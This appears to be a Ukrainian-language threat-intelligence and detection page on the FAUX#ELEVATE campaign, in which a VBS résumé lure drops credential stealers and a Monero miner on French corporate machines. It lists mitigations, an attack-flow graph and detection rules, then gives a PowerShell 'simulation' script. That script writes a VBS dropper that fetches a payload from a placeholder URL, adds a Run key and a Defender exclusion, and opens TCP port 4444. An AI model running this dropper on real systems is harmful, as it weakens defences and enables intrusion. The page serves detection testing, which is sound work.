Стежити 
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Кіберзлочинна операція використовує шкідливий VBS-файл резюме для атак на франкомовні корпоративні середовища. Завантажувач сильно заплутаний і спроектований для виконання лише на комп’ютерах, які підключені до домену, де він розгортає шкідливе ПЗ для крадіжки облікових даних поряд з Monero майнером. Кампанія використовує довірені сервіси, такі як Dropbox, і зламані марокканські сайти WordPress для розміщення шкідливих вантажів. Викрадені дані передаються через SMTP на mail.ru, а шкідливе ПЗ видаляє сліди після виконання для зменшення видимості судово-медичної експертизи.
Розслідування
Дослідники проаналізували назад VBS-завантажувач, розкрили його перевірки середовища та створили карту повного багатоступеневого ланцюга інфікування, включаючи вилучення з 7-Zip, власний RAT під назвою RuntimeHost.exe, крадіжку облікових даних бравзерів ChromElevator та майнінг активності XMRig. Вони також виявили підтримуючу інфраструктуру, таку як IP-адреси, записи динамічного DNS і зламані сервери WordPress. Стійкість була пов’язана з ключами запуску реєстру та прихованим розкладом завдань.
Пом’якшення
Захисники повинні блокувати підозрілі файли VBS і забезпечувати жорсткі заходи контролю для вкладень електронної пошти. Спостереження повинно зосереджуватися на аномальному виконанні wscript.exe, командах PowerShell, які додають виключення Defender, і змінах реєстру, що стосуються EnableLUA. Організації повинні обмежити вихідний SMTP з нелистовими додатками і спостерігати за з’єднаннями з відомою інфраструктурою Dropbox і майнінгових пулів. Всі виявлені ключі реєстру або розклади завдань мають бути видалені або заблоковані.
Реагування
Команди захисту повинні виявляти створення ключів запуску “Microsoft Media Service” і “z_MicrosoftEdgeAutoLaunch_2EDFBF”, а також приховане заплановане завдання “MicrosoftUpdateService”. Повідомлення мають спрацьовувати на процесах wscript.exe, які звертаються до Dropbox або задокументованих доменів WordPress. Шкідливі файли повинні бути ізольовані, хост ізольований, а вихідні облікові дані бравзерів мають бути скинуті. Після цього судово-медичний огляд має визначити, чи були викрадені дані передані через mail.ru.
"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef process fill:#ffddaa classDef technique fill:#c0c0c0 %% Node definitions step_phishing["<b>Техніка</b> – T1566.001 Фішинг: Сперфішинг Вкладення<br/><b>Опис</b>: Лист з шкідливим вкладенням, яке при відкритті доставляє початкове навантаження."] class step_phishing action step_user_execute["<b>Техніка</b> – T1204.002 Виконання Користувача: Шкідливий файл<br/><b>Опис</b>: Жертва запускає прикріплений VBS файл, активуючи завантажувач."] class step_user_execute action step_dropper["<b>Техніка</b> – T1059.005 Visual Basic (VBScript)<br/><b>Техніка</b> – T1027 Заплутані файли або інформація<br/><b>Опис</b>: Заплутаний VBS скрипт діє як завантажувач, витягуючи додаткові компоненти."] class step_dropper action step_domain_check["<b>Техніка</b> – T1069.002 Виявлення Групи Дозволів: Домени<br/><b>Опис</b>: Перевіряє, чи приєднаний комп’ютер до домену, щоб адаптувати поведінку."] class step_domain_check technique step_uac_bypass["<b>Техніка</b> – T1548.002 Обхід Контролю Облікових Записів Користувачів<br/><b>Техніка</b> – T1562.001 Послаблення Захисту: Вимикання Інструментів Безпеки<br/><b>Техніка</b> – T1564.012 Приховування Артефактів: Виключення Defender<br/><b>Опис</b>: Підвищує привілеї, вимикає захист і додає виключення."] class step_uac_bypass technique step_download["<b>Техніка</b> – T1102 Веб-сервіс<br/><b>Техніка</b> – T1102.001 Розв’язувач Dead Drop<br/><b>Опис</b>: Завантажує додаткові компоненти з Dropbox або веб-локацій."] class step_download technique step_deploy_toolkit["<b>Інструмент</b> – RuntimeHost.exe, XMRig Майнер, Крадіжники Бравзерів<br/><b>Опис</b>: Розгортає компоненти для майнінгу, крадіжки облікових даних і подальшої експлуатації."] class step_deploy_toolkit tool step_cred_access["<b>Техніка</b> – T1555.003 Облікові Дані з Бравзерів<br/><b>Опис</b>: Витягає збережені паролі бравзерів і кукі."] class step_cred_access technique step_collect_files["<b>Техніка</b> – T1005 Дані з Локальної Системи<br/><b>Опис</b>: Збирає файли з робочого столу користувача для передачі."] class step_collect_files technique step_exfiltration["<b>Техніка</b> – T1048.002 Експлікація через Зашифрований Протокол, що не є Центром Управління: SMTP<br/><b>Техніка</b> – T1071.003 Веб-протоколи: Протоколи Пошти<br/><b>Опис</b>: Відправляє зібрані дані через зашифрований SMTP."] class step_exfiltration technique step_resource_hijack["<b>Техніка</b> – T1496 Викрадення Ресурсів<br/><b>Опис</b>: Використовує XMRig для майнінгу криптовалюти на комп’ютері жертви."] class step_resource_hijack technique step_process_injection["<b>Техніка</b> – T1055 Ін’єкція в Процеси<br/><b>Опис</b>: Інжектує шкідливий код у explorer.exe для приховування активності."] class step_process_injection technique step_c2["<b>Техніка</b> – T1102 Веб-сервіс (HTTPS/Динамічний DNS)<br/><b>Опис</b>: Підтримує управління та контроль через зашифрований веб-трафік і налаштовані порти."] class step_c2 technique step_persistence["<b>Техніка</b> – T1547.001 Ключі Запуску Реєстру / Папка Автозапуску<br/><b>Техніка</b> – T1053 Заплановане Завдання/Робота (Приховані)<br/><b>Опис</b>: Створює стійкість через ключ запуску в реєстрі і приховане завдання розкладу."] class step_persistence technique step_cleanup["<b>Техніка</b> – T1070.004 Видалення Файлів<br/><b>Опис</b>: Видаляє артефакти та журнали, щоб уникнути виявлення."] class step_cleanup technique %% Edge connections step_phishing –>|приводить до| step_user_execute step_user_execute –>|приводить до| step_dropper step_dropper –>|приводить до| step_domain_check step_domain_check –>|приводить до| step_uac_bypass step_uac_bypass –>|приводить до| step_download step_download –>|приводить до| step_deploy_toolkit step_deploy_toolkit –>|дозволяє| step_cred_access step_deploy_toolkit –>|дозволяє| step_collect_files step_cred_access –>|комбінується з| step_collect_files step_cred_access –>|підтримує| step_exfiltration step_collect_files –>|підтримує| step_exfiltration step_deploy_toolkit –>|дозволяє| step_resource_hijack step_deploy_toolkit –>|дозволяє| step_process_injection step_process_injection –>|забезпечує| step_c2 step_c2 –>|використовується| step_exfiltration step_deploy_toolkit –>|створює| step_persistence step_persistence –>|супроводжується| step_cleanup step_exfiltration –>|супроводжується| step_cleanup "
Потік Атаки
Виявлення
Можливе Визначення Домена через Пошук IP (через dns)
Перегляд
Вимкнення Реального Моніторингу Windows Defender та Інші Зміни Налаштувань (через cmdline)
Перегляд
Підозріле Виконання у Профілі Загального Користування (через process_creation)
Перегляд
Можливе Уникнення Захисту через Розпакування Зашифрованого Архіву Використовуючи 7-Zip (через cmdline)
Перегляд
LOLBAS WScript / CScript (через process_creation)
Перегляд
Підозріле Модифікування Виключень Defender (через cmdline)
Перегляд
Підозрілі Зміни Налаштувань Windows Defender (через powershell)
Перегляд
Можливі Точки Персистентності [ASEPs – Hive Software/NTUSER] (через registry_event)
Перегляд
Підозріла Запланована Задача (через audit)
Перегляд
Коротке Ім’я Файлу (через cmdline)
Перегляд
Можливий Обхід UAC – Спроба Вимкнення UAC (через registry_event)
Перегляд
Підозрілі Файли у Профілі Загального Користування (через file_event)
Перегляд
IOC (HashSha256) для виявлення: Аналіз FAUX#ELEVATE: Актори загрози націлюються на Францію за допомогою пасток CV для розгортання Криптовалютних майнерів та крадіїв даних, що націлюються на корпоративні середовища
Перегляд
IOC (SourceIP) для виявлення: Аналіз FAUX#ELEVATE: Актори загрози націлюються на Францію за допомогою пасток CV для розгортання Криптовалютних майнерів та крадіїв даних, що націлюються на корпоративні середовища
Перегляд
IOC (Emails) для виявлення: Аналіз FAUX#ELEVATE: Актори загрози націлюються на Францію за допомогою пасток CV для розгортання Криптовалютних майнерів та крадіїв даних, що націлюються на корпоративні середовища
Перегляд
IOC (DestinationIP) для виявлення: Аналіз FAUX#ELEVATE: Актори загрози націлюються на Францію за допомогою пасток CV для розгортання Криптовалютних майнерів та крадіїв даних, що націлюються на корпоративні середовища
Перегляд
Виявлення Крадіжки Облікових Даних та Майнінгу Криптовалюти FAUX Elevate [Windows Network Connection]
Перегляд
Виявлення Комунікації SMTP та C2 Доменних [Windows Network Connection]
Перегляд
Виявлення Постійності та Крадіжки Облікових Даних Кампанії FAUX#ELEVATE [Windows Process Creation]
Перегляд
Виявлення Шкідливого Dropper VBS та Модифікацій Брандмауера [Windows Process Creation]
Перегляд
Виконання Симуляції
Попередня умова: Перевірка Доданих та Початкових Даних повинна бути пройдена.
Обґрунтування: Цей розділ деталізує точне виконання техніки противника (TTP), призначеної для спрацьовування правила виявлення. Команди та наратив МАЮТЬ безпосередньо відображати ідентифіковані TTP та мають генерувати точну телеметрію, очікувану правилами виявлення.
-
Наратив Атаки та Команди:
- Стадія 1 – Викидання шкідливого VBS: Нападник записує dropper VBS, який завантажує другорядне навантаження та записує ключ запуску реєстру для стійкості.
- Стадія 2 – Виконання VBS через
wscript.exeз PowerShell у ролі батьківського процесу, тим самим задовольняючи умову батьківсько-дочірнього стану виявлення. - Стадія 3 – В межах VBS, виконайте PowerShell, щоб додати виключення Microsoft Defender (T1562.001) і Netsh для відкриття вхідного порту TCP 4444 (T1562.004) для C2.
- Стадія 4 – Видалення доказів після успіху.
-
Скрипт Регресійного Тестування: (PowerShell – самостійний; запустити з правами адміністратора)
# ----------------------------------------------------------------------- # Симуляція Шкідливого VBS Dropper – активізує правило Sigma: # Образ == "*wscript.exe" AND БатьківськийОбраз у ("*powershell.exe","*netsh.exe") # ----------------------------------------------------------------------- $vbsPath = "$env:Tempmalicious_dropper.vbs" $payloadUrl = "http://example.com/payload.exe" # заповнювач URL $payloadPath = "$env:Temppayload.exe" # 1. Створити шкідливий VBS, що: # • Завантажує навантаження # • Записує ключ запуску для стійкості # • Викликає PowerShell для додавання виключень Defender # • Викликає Netsh для відкриття правило брандмауера $vbsContent = @" Set objXML = CreateObject("Microsoft.XMLHTTP") objXML.Open "GET", "$payloadUrl", False objXML.Send If objXML.Status = 200 Then Set objStream = CreateObject("ADODB.Stream") objStream.Type = 1 objStream.Open objStream.Write objXML.ResponseBody objStream.SaveToFile "$payloadPath", 2 End If
‘ Персистентність через ключ запуску Set objShell = CreateObject(“WScript.Shell”) objShell.RegWrite “HKCUSoftwareMicrosoftWindowsCurrentVersionRunmalicious”, “$payloadPath”
‘ Виключення Defender через PowerShell (виконано внутрішньо) objShell.Run “powershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '$payloadPath'“”, 0, True
‘ Відкрити порт брандмауера 4444 через Netsh (виконано внутрішньо) objShell.Run “netsh.exe advfirewall firewall add rule name="MaliciousPort” dir=in action=allow protocol=TCP localport=4444″, 0, True “@
Set-Content -Path $vbsPath -Value $vbsContent -Encoding ASCII
# 2. Запустити VBS за допомогою PowerShell як батьківський процес
Write-Host "[*] Запуск шкідливого VBS через wscript.exe (батько: PowerShell)"
Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `"wscript.exe `"$vbsPath`"`"" -Wait
# 3. Перевірка, що правило брандмауера було додано (необов'язково)
netsh advfirewall firewall show rule name=MaliciousPort
# 4. Очищення артефактів (навантаження та VBS) – залишається для окремого розділу очищення
Write-Host "[+] Симуляція завершена. Перегляньте сповіщення в SIEM."
-
Команди Очищення: (запустіть після перевірки)
# Видалити правило брандмауера netsh advfirewall firewall delete rule name="MaliciousPort" # Видалити виключення Defender powershell.exe -Command "Remove-MpPreference -ExclusionPath '$env:Temppayload.exe'" # Видалити ключ запуску персистентності reg delete "HKCUSoftwareMicrosoftWindowsCurrentVersionRunmalicious" /f # Видалити файли Remove-Item -Path "$env:Tempmalicious_dropper.vbs" -Force Remove-Item -Path "$env:Temppayload.exe" -Force Write-Host "[+] Очистка завершена."